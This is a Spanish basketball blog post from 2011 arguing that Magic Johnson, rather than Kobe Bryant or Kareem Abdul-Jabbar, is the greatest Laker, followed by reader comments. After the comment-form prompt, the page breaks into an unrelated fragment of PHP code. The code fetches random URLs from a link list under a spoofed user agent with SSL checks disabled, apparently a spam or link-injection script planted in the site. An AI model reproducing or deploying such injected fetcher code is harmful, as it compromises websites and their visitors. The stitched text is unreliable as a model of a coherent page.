El mejor Laker de la historia

09 de November de 2011 por TheDeerHunter

En medio del sopor del lockout esta semana estuvimos a punto de pasar por alto una importante conmemoración. Un 7 de Noviembre de hace 20 años Earvin “Magic” Johnson anunciaba su retirada del baloncesto por ser portador del VIH.

Baloncestísticamente hablando es el día más triste que pudiera recordar. Se trata del mayor ídolo que haya tenido nunca y que posiblemente tendré. Mi fascinación por su modo de entender el juego trasciende lo meramente deportivo, superando incluso lo artístico. De sus “interpretaciones” nació un hechizo que dura casi 30 años. Es evidente que no represento un caso aislado. Ni mucho menos.

Gonzalo Vázquez dijo de él: De la misma manera que Michael Jordan fue el galardón individual que el baloncesto se concedió tras un siglo de vida, Magic Johnson fue la recompensa colectiva del juego durante el mismo largo trayecto.” En mi opinión la frase es exacta a más no poder y Magic representa la esencia misma del baloncesto como deporte de equipo.

Pero no vengo aquí a compartir nostalgias y alabanzas ni a redescubrir o dorar su figura. No soy el más indicado y cualquier interesado ya conoce el tema a la perfección. Trato de reflexionar acerca de una cuestión más general. ¿Es Magic Johnson el Laker más importante de la historia?

La lista de números retirados en la franquicia angelina es la siguiente:

–         Nº13 Wilt Chamberlain

–         Nº22 Elgin Baylor

–         Nº25 Gail Goodrich

–         Nº32 Magic Johnson

–         Nº33 Kareem-Abdul Jabbar

–         Nº42 James Worthy

–         Nº44 Jerry West

Para completar la base de comparación resulta obligado añadir 3 nombres más:

–         Nº99 George Mikan

–         Nº34 Shaquille O’Neal

–         Nº24 Kobe Bryant

Puntualicemos que, a diferencia de otras listas que aquí hemos expuesto, la reflexión gira específicamente en torno en la importancia para la franquicia. Eso excluye logros de los jugadores en otros equipos y hace hincapié en los resultados obtenidos. En una casa como la de los Lakers estaremos hablando inevitablemente de anillos pero no pensamos en jugadores como Fisher u Horry (de cuya importancia ni se nos ocurriría dudar) sino de los referentes/protagonistas máximos de los triunfos.

Sobre estas premisas se empiezan a caer algunos nombres de la pugna. Creo que tanto “Big Game” Worthy como Gail Goodrich (el menos conocido de la lista y del que nos comprometemos a hablar pronto) son lo más parecido a un jugador de rol que hay en la lista. Bajo ningún concepto pueden optar a ser “El mejor Laker de la historia”.

Sí podría haberlo sido Baylor, con 14 años de dorado y púrpura aportando una producción monstruosa. 27.4 puntos, 13.5 rebotes y 4.3 asistencias. No tuvo suerte y con ningún anillo en sus dedos su herencia se diluye mucho. A él le reprocharía un 43% de acierto que evoca bastante a un “Iverson” de la vida.

De forma similar podríamos tratar a otros dos coetáneos suyos, ambos top 10 históricos y excelencias en todas las facetas baloncestísticas. Wilt “The Big Dipper” Chamberlain jugó para L.A. únicamente 5 de las 13 campañas que permaneció en la liga, en la recta final de su carrera. Jerry West, en cambio, jugó sus 14 años de profesional para los amarillos. 1 único anillo ganaron junto a Goodrich en el increíble equipo del 72. Insuficiente para mantenerlos en la pomada.

Muchos llegaron a pensar que Shaq sería capaz de hacerse con cualquier trono. Lidera sobradamente los ratios de eficiencia de la franquicia (según basketballreference). No desmerecen tampoco sus 3 anillos y 1 subcampeonato en los 8 años que jugó allí. Da la sensación de que llegó hasta donde tuvo voluntad de llegar. Perdió el hambre a mitad de camino (o a mitad de camino le entró hambre de otras cosas) y tampoco le beneficia haber jugado para el eterno rival en este debate.

Con esto llegamos al club de los 5 anillos. Magic, Kareem, Mikan y Kobe.

El caso de Mikan es el más complejo y delicado de todos. Tan sólo estuvo 7 años en los Minneapolis Lakers pero consiguió 5 títulos que valen tanto como los otros. Números de 28 puntos, 14 rebotes sin despeinarse, siempre que fueran contabilizados. La liga en pañales, menor exigencia individual y colectiva. No se puede evitar que surjan ciertas dudas razonables sobre su impacto real y cuesta mucho extrapolar su figura a otras épocas que no sean la suya. Resulta fácilmente comprensible que muy pocos le sitúen al mismo nivel que los otros monstruos de la lista.

Vaya por delante que para mí Jabbar es un jugador individualmente inmejorable. Lo considero superior a Magic en la mayoría de aspectos excepto en el creativo/estético o en términos específicos a cada uno de los puestos. Es el único hombre al que sitúo al lado de Michael Jordan en el Olimpo de los dioses. Sin embargo aquí hablamos de su trayectoria en los Lakers, con lo que dejamos de lado nada menos que un título, un subcampeonato, 3 MVPs, un buen puñado de hitos y la producción de su etapa tan increíble en Milwaukee. Con la llegada de Magic y el paso de los años su producción se normalizó y, aunque siguió siendo el principal pilar y ejecutor del showtime, cedió al liderazgo del 32. El grueso de la carrera de Jabbar en L.A. es bajo la batuta de éste.

Así, la cuestión habría quedado resuelta de no ser por la obsesiva determinación de Kobe Bryant de subirse a las barbas de cualquiera de los mitos existentes. Cuando en 2009 le elegíamos como 3er mejor escolta de todos los tiempos y nº20 de los “50 mejores” aún le restaba culminar alguno de sus hitos y lo mejor en su caso es que el cuento no ha acabado todavía. Un hueso duro para Magic como en la cancha lo ha sido para cualquiera.

Aspectos comparables entre ambos hay tantos como diferencias. Para empezar cuesta encontrar razones de peso para inclinar la balanza dentro de los resultados. Magic sumó 2 subcampeonatos más y Kobe ganó 3 anillos a la sombra del perro grande. Sin embargo Magic rara vez fue primera espada en plantillas de un nivel difícil de igualar y Kobe a sus 32 años parece mantenerse perfectamente capacitado para liderar a los suyos a más finales y triunfos.

Tampoco es concluyente la aportación numérica individual. Según basketballreference sus ratios de eficiencia son casi calcados. Magic gana en los promedios, siendo el mejor pasador de la historia, un inmenso reboteador y sorprendentemente tan buen ladrón como el escolta. The “Black Mamba” es mucho mejor anotador, más letal en los momentos críticos y también mejor defensor. La retirada prematura de Magic beneficia a la larga a Kobe, quien ya lidera un número significativo de tablas acumuladas/históricas de la franquicia. Eso sí, será difícil que Kobe alcance a Magic en los 3 MVPs que el 32 acumula.

A nivel técnico/estético creo que podríamos aplicar con matices la frase de Gonzalo Vazquez comparando a Magic con Jordan. Kobe, en mi opinión, posee la mayor depuración técnica concebible en cada una de las facetas del juego. El enfoque técnico de Magic y su aplicación al colectivo ya hemos dicho que es uno de los mayores hitos que ha alumbrado el baloncesto, aunque alguna de las facetas (como es el tiro) no están a la altura de la excelencia. Por ahí, si me lo permitís, un empate técnico.

Me empezarían a surgir dudas en cuanto al liderazgo. Creo que Kobe tiene un punto tiburón, la competitividad casi enfermiza, capaz de exigir a si mismo y a sus compañeros lo máximo de cada uno. Sin embargo también le hemos detectado puntos egoístas que desconectaban irremediablemente a sus compañeros. Magic quizás no fuera tan feroz pero lograba conectar con los suyos y con el público como nadie lo ha hecho, transmitiendo una sensación lúdica/teatral en la que todos parecían disfrutar. Por carisma gana Magic de goleada.

Por ahí creo que es donde la cuestión finalmente se resuelve. Kobe ha ofrecido un baloncesto maravilloso pero no ha aportado una personalidad global más allá de lo que en si mismo empezaba y acababa. Los Lakers del siglo XXI rezuman más de Tex Winters, Phil Jackson y el triángulo que de las características particulares del escolta. Sin embargo la aportación más importante que ha dado la franquicia es el Show Time y este sí bebe directamente de la magia del mejor base de la historia.

Quizás de aquí a un tiempo Kobe haya ganado unos anillos más aniquilando como él ya sabe hacer todos los registros del club. En ese momento tendría que tragarme mis palabras. Mientras tanto, después de más de 20 años de su retirada, Magic Johnson sigue siendo el máximo icono de la franquicia. Apuesto a que lo seguirá siendo durante mucho tiempo.

Comenta

19 comentarios a esta entrada

  1. laker16 dice:
    #1

    Estoy de acuerdo en que Magic es el mejor laker de la historia. Creo que durante el periodo que el estuvo en LA lidero al equipo en su mejor epoca en cuanto a juego y resultados. Luego Kobe lo situaria justo por detras suyo.

      Citar

  2. Shaggy dice:
    #2

    Buenass!! Despues de varios años siguiendo el blog por fin me atrevo a participar en el. Un saludo a todos!!
    Yo tambien estoy de acuerdo, en que Magic es el mejor laker de la historia y posiblemente no hubiese dicusión si no se hubiese retirado antes de tiempo; pero kobe es mucho kobe y su obsesion por reventar marcas veremos donde lo lleva cuando se retire.

      Citar

  3. Viva_Dirk dice:
    #3

    Creo que puede haber dudas sobre si es el mejor o no de la historia de la franquicia, pero para mi no hay discusión en que es el mas importante, aunque Kobe se retire con 6 o 7 anillos, la imagen de Magic, el showtime, la rivalidad con Bird y todo lo que le rodeó le hacen el jugador mas importante de la franquicia.

      Citar

  4. HisRoyalAirness dice:
    #4

    En mi opinión lo es, sin ninguna duda. El único que podría discutirle el puesto es Kareem y creo que para la historia de Lakers Magic ha sido mucho, pero mucho más.
    Cambió el juego, la concepción de point guard y el pase-asistencia como parte del espectáculo; derrochaba tal creatividad y carisma que dudo que nunca volvamos a ver nada similar.

    Sobre sus “rivales” en este debate?

    Kareem: para mí el mejor 5 de siempre junto a Olajuwon, un tipo absolutamente dominante en ambos tableros y una leyenda de la NBA poseedor de uno de los tiros más infalibles (por no decir el que más) de todos los tiempos. Él es parte del Showtime, al igual que Worthy, pero fue algo que creó Magic. Uno no se entendería sin el otro pero es la mayor seña histórica de identidad de la franquicia y la generó un rookie de 20 años desde su primera temporada.

    Kobe: una máquina de competir, un niño prodigio y un arma ofensiva casi imparable. Ha llegado a ser uno de los grandes defensores de la liga a base de esfuerzo y una leyenda en activo. Pero no ha inventado nada nuevo y sus 3 primeros anillos fueron con quien fueron, haciendo unos numerazos pero a la sombra del Gran Cactus. Es casi un clon de Jordan en los movimientos, por eso le resta autenticidad.

    Lo he comparado con los que, en mi opinión, tiene derecho a discutirle el puesto y ni aún así.

    Alguien capaz de llegar a L.A. con 20 años y ser MVP de las Finales haciendo una de las mayores gestas que he visto en mi vida en el sexto partido con los famosos 42-15-7 y de ser, a parte de un espectáculo, un ganador absoluto y un competidor feroz, con una mano llena de anillos y formando junto a Bird la más legendaria de todas las rivalidades del deporte.

    Soy poco mitómano pero para mí en la NBA existe un Santísima Trinidad como en el cristianismo son el padre, el hijo y el espíritu santo: EARVIN “MAGIC” JOHNSON, MICHAEL “AIR” JORDAN y LARRY “LEGEND” BIRD

    Fin de la parrafada

      Citar

  5. laker16 dice:
    #5

    Otro de debate que yo veo incluso mas interesante que este es sobre quien es el mejor Celtic de la historia. Creo que podria dar mas juego de lo que parece.

      Citar

  6. HisRoyalAirness dice:
    #6

    Para mí el mejor Celtic de la historia es Larry. muchos diran que Rusell pero creo que nadie lo pondría ni en su quinteto favorito ni en el segundo

      Citar

  7. Viva_Dirk dice:
    #7

    Si que da para un post eso sin duda. Total, ganar 11 anillos en 13 temporadas tampoco es tan dificil, jojo.

      Citar

  8. HisRoyalAirness dice:
    #8

    Bo, sabes que no lo digo por eso.

      Citar

  9. javiviver dice:
    #9

    Como puedo ver partidos de la nba

      Citar

  10. HisRoyalAirness dice:
    #10

    javiviver:
    Como puedo ver partidos de la nba

    Pues tienes que esperar a que acabe el lockout

      Citar

  11. Txusma dice:
    #11

    Si lo que quieres es matar el gusanillo con partidos antiguos aquí puedes encontrar alguno http://www.vagos.es/showthread.php?t=361895#

      Citar

  12. HisRoyalAirness dice:
    #12

    jaja lo del lockout lo decía de coña.

    Yo utilizo mucho esta página para bajar partidos y documentales, creo que es la mejor http://www.allsports-tv.com/forum

      Citar

  13. javiviver dice:
    #13

    Ok gracias

      Citar

  14. jmpa dice:
    #14

    De acuerdo en que Magic ha sido el mejor Laker de la historia.

    Hace años escuché una frase con la que estoy muy de acuerdo. Decía algo así…. “Michael Jordan ha sido el mejor atleta que ha jugado al baloncesto. Magic ha sido el mejor jugador de baloncesto.”

    Sin tener un físico privilegiado, sólo su altura de 2.05m le diferenciaba de los demás, tenía una forma de interpretar el juego, tanto en contraataque como en estático que no he vuelto a ver desde entonces.

    Probablemente volveremos a ver jugadores parecidos a Jordan (Kobe es un ejemplo), pero para que vuelva a salir alguien que se parezca, al menos de lejos, a Magic pasarán muchos, muchos años. Va a ser difícil volver a ver a un jugador que sepa desenvolverse bien en las 5 posiciones.

      Citar

  15. AndiD dice:
    #15

    Aquí os dejo este vídeo de Magic que seguro que a muchos habituales de este foro les encantará 🙂
    http://www.youtube.com/watch?v=q8Qbo0WqvOI&feature=player_embedded
    ESPECTACULAR!!

    Visto en nbamaniacs

      Citar

  16. Viva_Dirk dice:
    #16

    Menudo pasote de video Andi. Eso si, viendolo se me ocurren dos cosas:

    – En el partido 65 de la temporada Jabbar y demás hombres grandes deberian estar pensando ‘anda y que corra vuestra p!%&$”&O)’

    – Al tio que le pillara en un dia despistado Magic podia hacerle parecer el mas inutil del mundo, para jugar con ese hombre habia que estar sieeeeeeeeeeempre atento al máximo.

      Citar

  17. Viva_Dirk dice:
    #17

    Se me pasaba el pase del minuto 02:08 del video es una super pasada de la ostias megabrutal y todo lo que se quiera decir, no es especialmente bonito pero es taaaaaaaaaaan preciso que se ve a dos tios que pueden llegar pero va justo al sitio.

      Citar

  18. TheDeerHunter dice:
    #18

    Una de sus más grandes virtudes es lo rápido que era a pesar de su estatura… y lo coordinado, porque además era igual de rápido bontando balón que simplemente corriendo.

      Citar

  19. @lex dice:
    #19

    MAGIC, KOBE, JABBAR, WEST, ONEAL…. LOS 5 MEJORES INDIVIDUALMENTE HABLANDO

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>